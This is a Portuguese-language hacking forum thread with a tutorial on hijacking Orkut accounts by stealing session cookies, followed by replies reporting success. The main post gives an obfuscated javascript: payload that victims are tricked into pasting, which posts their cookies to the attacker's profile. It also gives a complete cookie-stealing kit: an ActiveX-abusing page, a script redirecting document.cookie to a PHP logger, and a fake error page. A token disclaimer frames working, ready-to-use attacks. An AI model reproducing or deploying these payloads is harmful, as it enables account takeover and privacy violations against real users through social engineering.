Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadindo Orkut via Cookies

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invadindo Orkut via Cookies

    ATENÇÃO: APESAR DE O TEXTO ESTAR ESCRITO NO MODO VERBAL IMPERATIVO, NÃO ESTOU INDUZINDO NINGUEM A REPETIR AS AÇÕES AQUI DECLARADAS. REPROVO O ATO BLACK-HAT, LAMER E SCRIPT-KID E EM MOMENTO ALGUM VOCÊ DEVE UTILIZAR O CONHECIMENTO PARA O MAL.


    Eu sei que é coisa de lamer, mas quem nunca invadiu uma conta do Orkut pelo método deles (aquele de criar o e-mail inexistente)?
    Vou postar aqui duas maneiras de se invadir uma conta do Orkut via cookies.
    Os cookies são pequenos arquivos de texto salvos no seu computador para que os sites lhe reconheçam quando você se conectar novamente a eles. Isto é visto quando você fecha seu navegador e, quando o abre, seu orkut está logado.
    Mas, com a insegurança do Internet Explorer, e o mal-desenvolvimento e administração de cookies do Orkut lhe dá a possibilidade de estar na conta desta pessoa, apenas copiando os cookies para si.
    Mas quem iria na casa da pessoa, mesmo que com engenharia social (lábia), para copiar os cookies para um pendrive? Não sei.
    Mas (3 "mas" seguidos kkk) para este feito, a vítima precisa usar o Internet Explorer (ou, como eu prefiro chamar, ieca) e você estar usando o Mozilla Firefox, com um add-on que possibilite a alteração de cookies (recomendo este Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).

    Método 1
    Com este método, a pessoa injetará o código JavaScript em seu navegador. Veja o código que ela deverá colar na barra de endereço e apertar "Enter".
    Código:
    javascript:document.body.innerHTML+='<iframe name="flood" width="0" height="0" frameborder="0"></iframe>';function redre(){setTimeout("location.href=\"%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78\";", 2000)};flood.location="%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78";dscrap=document.getElementById('scrapText');setTimeout('df=flood.document.forms[1];df.innerHTML+=\'<input type="submit" name="Action.submit">\';df.action="%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78%3F%75%69%64%3DAQUI O ENDEREÇO DE SEU PERFIL";flood.document.getElementById(\'scrapText\').value=document.cookie;flood.document.getElementsByTagName(\'input\')[\'Action.submit\'].click();redre();', 3000);void(0)
    O código está usando a criptografia "estilo Google". Substitua a parte onde está "AQUI O ENDEREÇO DE SEU PERFIL" pelo seu UID, conseguido através da URL de seu perfil.
    Ao ter certeza de que o código foi executado, abra sua página de recados e veja que os cookies colocados pelo Orkut, no computador da pessoa, foram enviados para lá. Assim, basta copiar o que se encontra após "ORKUTPREF=ID=" para a área de transferência.
    Agora, abra o seu editor de cookies (add-on) e procure pelo cookie "orkut_state". Após isso, veja que há a chave "ORKUTPREF=ID=". Modifique-a, com o conteúdo colocado na área de transferência. Clique em Salvar, e depois em Fechar.
    Agora, clique em "Início" e veja o que acontece.
    Lembre-se que o código não produz ação visível. Portanto, coloque a criatividade para funcionar. Adicione mais códigos (JavaScript) que façam coisas legais, como um alert() com uma mensagem bonita ou algo assim.


    Método 2
    Já para este método, você terá que usar engenharia social para fazer com que a vítima clique no seu link. Você deve ter um serviço de hospedagem HTTP com PHP (como o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., que é gratuito). Também é possível utilizar um script que disponibilizei há um tempo, que faz com que seu scrap seja repassado automaticamente (procure por 0KaL no fórum, lembrando que o primeiro caractere não é a letra O, e sim o número 0). Assim, teremos 5 arquivos:
    • index.htm
    • sv.js
    • sv.php
    • hackeds.txt
    • end.htm

    Então, vamos aos códigos:
    index.htm
    Código HTML:
    <body onload="setTimeout('vipz.DOM.body.innerHTML=\'n\'');setTimeout('main()',500)">
    <object id="vipz" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0" align="middle">
    <PARAM NAME="ActivateApplets" VALUE="1">
    <PARAM NAME="ActivateActiveXControls" VALUE="1">
    </object>
    <SCRIPT src="sv.js">
    </SCRIPT>
    sv.js
    Código HTML:
    function shellscript()
    {
    window.name="poorchild";open("http://www.orkut.com/About.aspx","poorchild");
    
    }
    
    function main()
    {vipz.DOM.Script.execScript(shellscript.toString());
    vipz.DOM.Script.setTimeout("shellscript()");
    var myloc=vipz.DOM.location.href;setTimeout('vipz.DOM.Script.execScript
    
    ("window.location.href=\'sv.php?sv=\' + escape(document.cookie);")',2000);
    }
    sv.php
    Código PHP:
    <?php
    $cookies 
    addslashes($_GET['sv']);
    $saving fopen("hackeds.txt""a+");
    fwrite($saving$cookies."
    -----------
    "
    );
    fclose($saving);
    header("location: end.htm");
    ?>
    hackeds.txt
    Este arquivo irá salvar os dados obtidos, portanto, deverá ser em branco.

    end.htm
    Este arquivo será a página final. Com a criatividade em jogo, invente um erro bem convincente.

    Faz bem saber que este último método funciona com uma vasta quantidade de sites, inclusive o fotolog.

    Agora, fim de códigos. O processo a partir daqui, de modificação dos seus prórprios cookies, substituindo-os pelos da vítima, será semelhante ao do método 1.

    ATENÇÃO: APESAR DE O TEXTO ESTAR ESCRITO NO MODO VERBAL IMPERATIVO, NÃO ESTOU INDUZINDO NINGUEM A REPETIR AS AÇÕES AQUI DECLARADAS. REPROVO O ATO BLACK-HAT, LAMER E SCRIPT-KID E EM MOMENTO ALGUM VOCÊ DEVE UTILIZAR O CONHECIMENTO PARA O MAL.


    Até a próxima!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads

  • Font Size
    #2
    Porr*, muito bom.
    só é um poukinho complicado. ñ da pra fazer um video???

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    sigpic
    Estudante de sistemas de informação


    "SER hacker é TER uma forma de pensar característica.
    Quem pensa como hacker, age como hacker."
    Prof. Marco Aurélio Thompson.

    Comment


    • Font Size
      #3
      Esse add-ons nao funfa no firefox 4?

      sigpic
      Estudante de sistemas de informação


      "SER hacker é TER uma forma de pensar característica.
      Quem pensa como hacker, age como hacker."
      Prof. Marco Aurélio Thompson.

      Comment


      • Font Size
        #4
        ñ funfa. add-on que possibilite a alteração de cookies para download nao funfa nem no firefox 4 nem no 3.6.8
        me diz qual versão vc usa?
        sigpic
        Estudante de sistemas de informação


        "SER hacker é TER uma forma de pensar característica.
        Quem pensa como hacker, age como hacker."
        Prof. Marco Aurélio Thompson.

        Comment


        • Font Size
          #5
          muito show os dois metodos fucionaram bem

          Comment


          • Font Size
            #6
            eu sempre atualizo a minha versão do FF, mas mantenho uma antiga (que você pode achar pela internet) em máquina virtual.
            mas, é como eu disse, eu recomendei aquilo, nada impede de usar um da sua preferência.
            e sobre o vídeo: eu até poderia criar, mas estou meio sem tempo, estudando longe... mas vo dar uma organizada e tentar (claro q vai ser uma simulação, ne?).
            vlw
            Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



            Notify-list · Twitter · Blog

            Nova lei: Invadir computadores protegidos é crime.
            Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

            Comment


            • Font Size
              #7
              ah, e vc pod tbem usar o Mantra, que ja vem com um add-on do tipo.
              Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



              Notify-list · Twitter · Blog

              Nova lei: Invadir computadores protegidos é crime.
              Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

              Comment


              • Font Size
                #8
                coisa de n00b.

                Comment


                • Font Size
                  #9
                  coisa de n00b.
                  Eu sei que é coisa de lamer, mas quem nunca invadiu uma conta do Orkut pelo método deles (aquele de criar o e-mail inexistente)?
                  REPROVO O ATO BLACK-HAT, LAMER E SCRIPT-KID E EM MOMENTO ALGUM VOCÊ DEVE UTILIZAR O CONHECIMENTO PARA O MAL.
                  É um texto de caráter acadêmico. Não o escrevi para dizer "invada um Orkut", e sim, "o Orkut, que é de uma gigante, possui falhas de segurança. Então, imagine sites menores".
                  Mas o ponto de vista do texto foi seu... Cada um entende o que quer.
                  Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



                  Notify-list · Twitter · Blog

                  Nova lei: Invadir computadores protegidos é crime.
                  Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

                  Comment

                  X
                  Working...
                  X